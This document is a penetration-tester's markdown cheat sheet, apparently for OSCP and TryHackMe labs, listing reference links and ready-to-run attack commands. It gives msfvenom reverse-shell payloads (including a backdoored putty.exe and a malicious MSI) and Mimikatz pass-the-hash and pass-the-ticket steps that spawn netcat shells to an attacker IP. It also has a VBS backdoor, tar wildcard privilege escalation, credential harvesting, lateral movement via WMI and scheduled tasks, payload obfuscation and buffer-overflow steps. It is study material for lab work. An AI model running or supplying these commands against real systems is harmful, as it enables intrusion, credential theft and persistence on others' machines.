# <center> fr4mered - Notes Cheat Sheet

## Exploits Databases
  - [***exploit-db***](https://www.exploit-db.com/)
  - [***cve-details***](https://www.cvedetails.com/vulnerability-list/)
  - [***securityfocus***](https://www.securityfocus.com/vulnerabilities)
  - [***nist.gov***](https://nvd.nist.gov/vuln/search)
  - [***rapid7***](https://www.rapid7.com/db/?q=&type=)
  - [***packetstorm***](https://packetstormsecurity.com/files/tags/exploit)
  
## Payloads for RevShell
  - [***Payload All The Things***](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#windows-staged-reverse-tcp)
  - [***Nishang repo***](https://github.com/samratashok/nishang)

## TTY spawn References for Linux
  - [***book.hacktricks***](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys)
  - [***sushant747***](https://sushant747.gitbooks.io/total-oscp-guide/content/spawning_shells.html)
  
## Cmd Cheat Sheet to PrivScal 

### Linux
  - [***blog.g0tmi1k***](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
  - [***gtfobins***](https://gtfobins.github.io/)
  - [***pentestbook***](https://chryzsh.gitbooks.io/pentestbook/content/privilege_escalation_-_linux.html)

### Windows
  - [***fuzzysecurity***](https://fuzzysecurity.com/tutorials/16.html)
  - [***pwnwiki***](http://pwnwiki.io/#!privesc/windows/index.md)
  - [***absolomb***](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
  - [***Details About Windows Access Tokens***](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
  - [***steflan-security***](https://steflan-security.com/windows-privilege-escalation-cheat-sheet/)
  - [***evets007***](https://github.com/evets007/¡OSCP-Prep-cheatsheet/blob/master/windows-privesc.md)
  - [***Payload All The Things***](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
  - [***hacking articles***](https://www.hackingarticles.in/window-privilege-escalation-automated-script/)
  - [***Windows Privileges Leaks***](https://github.com/gtworek/Priv2Admin)

### Meterpreter Cheat Sheet
  - [***linode***](https://www.linode.com/docs/guides/windows-red-team-privilege-escalation-techniques/)
  - [***getastra***](https://www.getastra.com/blog/security-audit/meterpreter-commands-post-exploitation/)
  - [***scaler***](https://www.scaler.com/topics/cyber-security/meterpreter-command-cheatsheet/)
  - [***hackers-arise***](https://www.hackers-arise.com/ultimate-list-of-meterpreter-command)
  - [***msfconsole exploit suggester***](screenshots/msf-exploit-suggester.png)

## Tools to automate PrivScal
### Linux
  - [***Linpeas***](https://github.com/peass-ng/PEASS-ng/releases)
  
### Windows
  - [***WinPEAS***](https://github.com/peass-ng/PEASS-ng/releases/)
  - [***JAWS***](https://github.com/411Hall/JAWS)
  - [***WindowsEnum***](https://github.com/absolomb/WindowsEnum)
  - [***Windows-Exploit-Suggester***](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
  - [***Windows Exploit Suggester - Next Generation***](https://github.com/bitsadmin/wesng)
  - [***Sherlock***](https://github.com/rasta-mouse/Sherlock)
  - [***PowerSploit***](https://github.com/PowerShellMafia/PowerSploit)
  - [***Windows Exploits***](https://github.com/51x/WHP)
  - [***PowerUp.ps1 from PowerShellMafia***](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1)

> For any legacy script written in python use 2to3 python tool for portability

## General toolkit
  - [***m0chan***](https://github.com/m0chan/Red-Teaming-Toolkit)
  - [***wiki.zenk***](https://wiki.zenk-security.com/doku.php?id=privilege_escalation)
  - [***m0nad***](https://github.com/m0nad/awesome-privilege-escalation#tools-1)
   
## Others Cheat Sheets References
  - [***0x4D31***](https://github.com/0x4D31/awesome-oscp)
  - [***akenofu***](https://github.com/akenofu/OSCP-Cheat-Sheet)
  - [***evets007***](https://github.com/evets007/OSCP-Prep-cheatsheet)
  - [***pentestmonkey***](https://pentestmonkey.net/?s=python&x=0&y=0)
  - [***backlion***](https://github.com/backlion/Offensive-Security-OSCP-Cheatsheets/blob/master/SUMMARY.md)
  - [***rodolfomarianocy***](https://github.com/rodolfomarianocy/OSCP-Tricks-2023)

---

# Gaining Access

## Mapping services
### bruteforcing
- [***book.hacktricks - bruteforcing all applications***](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force)

### rpcclient
- [***hacking articles - rpcclient enumeration***](https://www.hackingarticles.in/active-directory-enumeration-rpcclient/)

### pop3
- [***hacking articles - pop3 enumeration***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop)

### imap
- [***hacking articles - imap enumeration***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap)

### ftp
  - [***book.hacktricks - ftp enumeration***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp)
 
### rdp
  - [***book.hacktricks - rdp enumeration***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp)

### smb
#### using smb client:
##### to list all available shares
	smbclient -L //$host/
##### to login
	smbclient -U $user //$host/$user
##### to check found shares 
	smbclient //$host/$shares_found
##### mount remote directory into a local one
	sudo mkdir /mnt/$file_path
	sudo mount $host:$remote_path /mnt/$file_path

## DNS enum
### Zone transfer

![local DNS enum](screenshots/localdnsenum.png)
  
![Zone transfer](screenshots/localzonetransfer.png)

### dig 
	dig -t AXFR DOMAIN_NAME @DNS_SERVER
	dig example.com @1.1.1.1

### whois
	whois example.com

### nslookup
	nslookup $target

### host
	host $target

### traceroute
	traceroute $target


## Nmap basic scan
### basic port scan
	nmap $target -vvv

### agressive scan port 
	nmap nmap -A -p $port $target

### stealth scan port
	sudo nmap -sS -Pn -sV -p $port $target
	
## Bypassing Network Rules

### Different Protocol with Netcat UDP
	nc -u $target $port
	nc -ulvnp $port

### Port Manipulation with Nmap 
	nmap -sS -Pn -g 80 -F $target

### Session Splicing with Fragroute
	fragroute -f fragroute.conf $target

### Session Splicing with Nmap
	nmap -sS -F $target

### Invalid Packets with Nmap
	nmap --badsum $target
	nmap --scanflags FIN,URG-PUSH $target

## Scripting
### nse
#### rpc
	$ nmap -p 135 --script=rpc-grind.exe,rpcinfo.nse $target 
#### nfs
	$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $target
#### samba
	$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $target
#### rdp 
	$ nmap -p 3389 --script=rdp* $target
#### known Vulns
	$ nmap -oA nmap-vuln -Pn -script vuln -p $ports $target

### automates scan in windows
	enum4linux -A $host

## Searchsploit
### Search for exploit POC
	$ searchsploit $target

### Check details
	$ searchsploit -x exploit_module

## Bruteforcing
-  [***book.hacktricks - bruteforcing all applications***](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force)

### Hydra
	$ hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>
	
#### Web bruteforce example:
	$ hydra -l <username> -P /usr/share/wordlists/<wordlist> <IP> http-post-form "form shape:failure message"
	
### JohnTheRipper
	$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256

## Metasploit
### msfvenom
#### Generate Windows meterpreter reverse shell
	$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=attacker_IP LPORT=attacker_port -f exe -o shell-name.exe
#### Generate a reverse shell as an Windows executable
	$ msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

#### Generate a reverse shell as an .elf file for Linux
	$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf -o shell.elf
#### Serch for windows reverse shell using msfvenom
	$ msfvenom -l payloads | grep windows | grep reverse | grep shell
#### List the payload options
	$ msfvenom -p windows/shell_reverse_tcp --list-options

### msfconsole
#### Set up the Windows TCP handler in Metasploit
	$ use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST attacker_IP set LPORT attacker_port run

#### Set up for Linux TCP handler in Metasploit
	$ use exploit/multi/handler set PAYLOAD linux/x64/meterpreter_reverse_tcp set LHOST attacker_IP set LPORT attacker_port run
---

# Post-Exploitation

## On Linux

### bypass privileged mistakes
##### Files owned by the user
	$ find / -uid 1001 -type f -ls 2>/dev/null | grep -v "/proc*"
##### Files with the name of the user in it
	$ find / -name "*susan*" -type f -ls 2>/dev/null
##### Files with the word password in the home directory
	$ grep -i password -R .
##### SUID biT files
	$ find / -perm -u=s -type f 2>/dev/null
##### Set default PATH for Priv Escal through Path Variable Manipulation
	$ export PATH=/target_dir:$PATH
##### Write inside a file without a prompt
	$ echo -e '#!/bin/bash\n/bin/bash' > shell.sh
	$ echo "" > "--checkpoint-action=exec=sh shell.sh"
	$ printf '#!/bin/bash\nchmod +s /bin/bash' > shell.sh
##### Look for sensitive content
	find /path/to/directory -type f -exec grep -H "password" {} + 2>/dev/null

###### Interesting words
  - password
  - credentials

### System Enumeration
	ls /etc/*-release

### User Enumeration
	$ hostname
	$ cat /etc/passwd
	$ cat /etc/group
	$ cat /etc/shadow
	$ ls -lh /var/mail/
	$ who
	$ w
	$ last
	$ sudo -l

### Application Enumeration
	$ ls -lh /usr/bin/
	$ ls -lh /sbin/
	$ rpm -qa
	$ dpkg -l
	$ ps axjf
	$ ps -ef | grep "username"

### Network enumeration
#### Open TCP and UDP Ports
	$ netstat -na
#### arptable to check anothers potential machines
	$ arp -a
#### Check Local Network Rules
	$ IPtable list
#### Other cmmds
	$ ip a s
	$ cat /etc/resolv.conf
	$ netstat -atupn
	$ ss -tulnp
	$ lsof -i

## On Windows
### System
	$ systeminfo

### Check Installed Updates
	$ wmic qfe get Caption,Description

### Installed and Started Windows Services
	$ net start

### Applications
	$ wmic product get name,version,vendor
	$ sc qc "program name"

#### To see schedule tasks
	$ schtasks

#### To overwrite the "Task To Run" executable
	$ icacls

### Users
	$ whoami /priv
	$ whoami /groups
	$ net user
	$ net localgroup
	$ net localgroup administrators
	$ net accounts

### Network
	$ ipconfig /all
	$ netstat -abno
	$ arp -a
### SMB
	$ net share

#### Upload files using SMB service
	$ smbclient -c 'put myinstaller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' Korine.1994

### Harvesting Passwords
#### Unattended Windows Installations
 1. C:\Unattend.xml
 2. C:\Windows\Panther\Unattend.xml
 3. C:\Windows\Panther\Unattend\Unattend.xml
 4. C:\Windows\system32\sysprep.inf
 5. C:\Windows\system32\sysprep\sysprep.xml

#### PowerShell History
	$ type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

#### Saved Windows Credentials
	$ cmdkey /list
	$ runas /savecred /user:admin cmd.exe

#### IIS Configuration
	$ type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

### Using MSI to PrivEscal
#### Two Registry values
	$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
	$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

#### Malicious .msi file by msfvenom
	$ msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL\_PORT -f msi -o malicious.msi

#### Active the reverse Shell
	$ msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
---

### PowerShell
#### Load powershell in meterpreter session
	$ powershell_shell
#### Executing PowerUp script
	$ .\PowerUp.ps1
	$ Invoke-AllChecks

#### Download a file from remote machine using PowerShell
	$ powershell "(New-Object System.Net.WebClient).Downloadfile('http://your-thm-ip:8000/shell-name.exe','shell-name.exe')"
	
	$ powershell -c wget "http://IP:PORT/reverse.exe" -outfile "reverse.exe"
	
	$ Start-Process "shell-name.exe"

#### Bypass Execution Policy
	$ powershell -ex bypass -File thm.ps1

#### AD Users Enumeration
	$ Get-ADUser  -Filter *
	$ Get-ADUser -Filter * -SearchBase "CN=Users,DC=THMREDTEAM,DC=COM"

#### Enum Antivirus
	$ wmic /namespace:\\root\securitycenter2 path antivirusproduct
	$ Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

#### Enum Windows Defender
	$ Get-Service WinDefend

#### Enum host-based Firewall Status
	$ Get-NetFirewallProfile | Format-Table Name, Enabled

#### Enum Installed Applications
	$ wmic product get name,version

#### Get service details by name
	$ wmic service where "name like 'THM Demo'" get Name,PathName

#### Get process details about an application
	$ Get-Process -Name thm-demo

#### Get network info by pID
	$ netstat -noa |findstr "LISTENING" |findstr "ID"

#### Test Connection of a given Port
	$ Test-NetConnection -ComputerName 127.0.0.1 -Port 80

	$ (New-Object System.Net.Sockets.TcpClient("127.0.0.1", "80")).Connected

#### Search for a specific file
	Get-ChildItem -Path C:\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue

### Checklist on windows
  1. canRestart in each running proces
  2. Patch attached for which service
  3. If sc command doesn't work well, try the *-Service commnad to manipulate a process status.
  4. Abuse Writable Shares.
  5. RDP hijacking

### Active Directory

#### Enumeration

##### Credential Injection with runas
	$ runas.exe /netonly /user:<domain>\<username> cmd.exe

##### MMC enumeration
  - add domain to active directories into snaps-in

##### List all users in AD domain
	$ net user /domain

##### List all groups in AD domain 
	$ net group /domain

#### Powershell & Active Directory
##### Get user info
	$ Get-ADUser -Identity gordon.stevens -Server za.tryhackme.com -Properties *
	$ Get-ADUser -Filter 'Name -like "*stevens"' -Server za.tryhackme.com | Format-Table Name,SamAccountName -A

##### Get group info
	$ Get-ADGroup -Identity Administrators -Server za.tryhackme.com
	$ Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com

##### Get domain info
	$ Get-ADDomain -Server za.tryhackme.com

##### Altering AD Objects
	$ Set-ADAccountPassword -Identity gordon.stevens -Server za.tryhackme.com -OldPassword (ConvertTo-SecureString -AsPlaintext "old" -force) -NewPassword (ConvertTo-SecureString -AsPlainText "new" -Force)

	$ Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

	$ Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

#### Lateral Movement & Pivoting
##### Psexec
	$ psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

##### WinRm
	$ winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

##### Process Manipulation with sc  
	$ sc.exe \\TARGET create THMservice binPath= "net user munra Pass123 /add" start= auto

	$ sc.exe \\TARGET start THMservice

	$ sc.exe \\TARGET stop THMservice

	$ sc.exe \\TARGET delete THMservice

##### schtasks
	$ schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00 

	$ schtasks /s TARGET /run /TN "THMtask1" 

	$ schtasks /S TARGET /TN "THMtask1" /DELETE /F

##### Moving Laterally Using WMI
###### Connection to WMI from Powershell 
	$username = 'Administrator';
	$password = 'Mypass123';
	$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
	$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
###### Connecting to WMI From Powershell
	$Opt = New-CimSessionOption -Protocol DCOM
	$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
###### Remote Process Creation using WMI
	$Command = "powershell.exe -Command Set-Content -Path C:\text.txt -Value munrawashere";
	$ Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
	CommandLine = $Command }
	
###### Remote Process Creation using WMI on Legacy Systems
	$ wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe" 

###### Creating Services Remotely with WMI
	$ Invoke-CimMethod -CimSession $Session -ClassName Win32\_Service -MethodName Create -Arguments @{
	Name = "THMService2";
	DisplayName = "THMService2";
	PathName = "net user munra2 Pass123 /add"; # Your payload
	ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
	StartMode = "Manual"
	}

###### Starting service with WMI:
	$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'THMService2'"
	Invoke-CimMethod -InputObject $Service -MethodName StartService

###### Finally, stop and delete it.
	Invoke-CimMethod -InputObject $Service -MethodName StopService
	Invoke-CimMethod -InputObject $Service -MethodName Delete

###### Creating Scheduled Tasks Remotely with WMI
	$Command = "cmd.exe"
	$Args = "/c net user munra22 aSdf1234 /add"
	$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
	$ Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "THMtask2"
	$ Start-ScheduledTask -CimSession $Session -TaskName "THMtask2"

	# Delete the scheduled task after it has been used
	$ Unregister-ScheduledTask -CimSession $Session -TaskName "THMtask2"

###### Installing MSI packages through WMI
	$ Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}

	# Legacy Systems:
	$ wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi

##### mimikatz

###### Pass-the-hash for NTLM authentication
	# Get hashes from local users on the machine
	$ privilege::debug
	$ token::elevate
	$ lsadump::sam

###### Hashes from local users and user that recently logged onto the machine for NTLM
	$ privilege::debug
	$ token::elevate
	$ sekurlsa::msv

###### Perform attack after extract the hashes for NTLM
	$ token::revert
	$ sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

###### Pass-the-ticket for Kerberos
	$ privilege::debug
	$ sekurlsa::tickets /export
###### Once we have extracted the desired ticket, inject it
	$ kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi
###### To check if the tickets were correctly injected
	$ klist
###### Overpass-the-hash/Pass-the-key
	$ privilege::debug
	$ sekurlsa::ekeys

	# If we have the RC4 hash:
	$ sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
	# If we have the AES128 hash:
	$ sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"
	# If we have the AES256 hash:
	$ sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

##### Abusing User Behaviour
###### Backdooring .exe files
	$ msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_IP> lport=4444 -b "\x00" -f exe -o puttyX.exe
###### backdooring .vbs scripts
	$ CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_IP> 1234", 0, True

#### Exploiting AD checklist
  1. Try to exploit kerberos due to Constrained Delegation
  2. Try to catch admin relationship over another machine using bloodhound
  3. Check PrintSpooler Service
  4. Hunt for some .kbdx file and use keepass to decrypt it
  5. Try to exploit GPOs
  6. Try to exploit AD Certificates
  7. Try to exploit Domain Trusts

#### Persisting AD checklist
  1. DC Sync Attack
  2. Persistence through Tickets
  3. Persistence through Certificates
  4. Persistence through SID History
  5. Persistence through Group Membership
  6. Persistence through GPOs

#### Credentials Harvesting tools
  - [***Snaffler***](https://github.com/SnaffCon/Snaffler)
  - [***Seatbelt***](https://github.com/GhostPack/Seatbelt)
  - [***Lazagne***](https://www.hackingarticles.in/post-exploitation-on-saved-password-with-lazagne/)

#### Tools
  - [***Sharphound parameters***](https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html)
  - [***BloodHound***](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux)
  - [***SharpHound Releases***](https://github.com/BloodHoundAD/SharpHound/releases)
  - [***Mimikatz***](https://github.com/ParrotSec/mimikatz)
  - [***Sshuttle***](https://github.com/sshuttle/sshuttle)
  - [***Rpivot***](https://github.com/klsecservices/rpivot)
  - [***Chisel***](https://github.com/jpillora/chisel)
  - [***Hijacking Sockets with Shadowmove***](https://adepts.of0x.cc/shadowmove-hijack-socket/)
  - [***kekeo***](https://github.com/gentilkiwi/kekeo)

#### References
  - [***Exploiting AD***](https://benheater.com/tryhackme-exploiting-active-directory/)
  - [***Persisting AD***](https://benheater.com/tryhackme-persisting-active-directory/)
  - [***Credentials Harvesting***](https://simpuar.github.io/posts/THM-Credentials_Harvesting/)

## Miscellaneous
### dll hijacking with msfvenom
	$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_IP_address> LPORT=<your_port> -f dll > evil.dll
	
### get hashes with crackmapexec with a privileged user
	$ crackmapexec smb mailing.htb -u maya -p "m4y4ngs4ri" --sam 

### Shellshock
  - [***exploiting shellshock***](https://www.infosecarticles.com/exploiting-shellshock-vulnerability/)
  - [***wordlist for shellshock***](https://github.com/nccgroup/shocker/blob/master/shocker-cgi_listi)

### OSINT sources
  - [***HaveIBeenPwned***](https://haveibeenpwned.com/)
  - [***DeHashed***](https://www.dehashed.com/)

### Tar WildCard Injection
  - [***WildCard Injection - POC reference***](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/tar-wildcard-injection-privesc/)

### Payload obfuscation
#### base64 for obfuscation
	$ base64 ncat -lvnp 1234 -e /bin/bash
#### urlencode for obfuscation
	$ urlencode ncat -lvnp 1234 -e /bin/bash

> Use cyberchef to obsfuscation via Unicode

### Buffer Overflow
#### mona config
	$ !mona config -set workingfolder c:\mona\%p
#### Identifying the EIP offset
###### generate a cyclic pattern for exploit buffer
	$ msf-pattern_create -l [pattern length]
###### Find EIP value in the pattern created
	$ msf-pattern_offset -l [pattern length] -q [EIP address]
	
	$ !mona findmsp -distance [pattern length]
###### Generate bytearray
	$ !mona bytearray -b "\x00"
###### find badchars using bytearray
	$ !mona compare -f C:\mona\oscp\bytearray.bin -a <address>
###### Finding a Jump Point
	$ !mona jmp -r esp -cpb "\x00"
###### find a Jump Point
	$ !mona jmp -r esp -cpb "\x00"
###### Generate a rev shell payload with msfvenom
	$ msfvenom -p windows/shell_reverse_tcp LHOST=attacker_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c
---
### WordPress
#### scanning
	$ wpscan --url <target> -e
#### bruteforce login
	$ wpscan --url <target> -U admin -P /usr/share/wordlists/rockyou.txt
#### References
  - [***wpscan usage - POC***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress)

### Pentest in MySQL
#### References
  - [***book.hacktricks - mysql enumeration***](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql)

### Pentest in Docker
#### References
  - [***book.hacktricks - priv scal in docker***](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation)
  - [***Swordfish - Pentest in. Docker***](https://github.com/Swordfish-Security/Pentest-In-Docker)
  - [***cdk usage***](https://www.kitploit.com/2021/01/cdk-zero-dependency-container.html)

#### Tool
- [***cdk***](https://github.com/cdk-team/CDK#installationdelivery)


### Pentest in Firefox
#### Getting Firefox credentials with meterpreter
	$ use post/multi/gather/firefox_creds

#### Tool
  - [***Firefox decrypt***](https://github.com/unode/firefox_decrypt.git)


### Report Generator
	pandoc OSCP-exam-report-template_OS_v1.md \
	-o output.pdf \
	--from markdown+yaml_metadata_block+raw_html \
	--table-of-contents \
	--toc-depth 6 \
	--number-sections \
	--top-level-division=chapter \
	--highlight-style breezedark
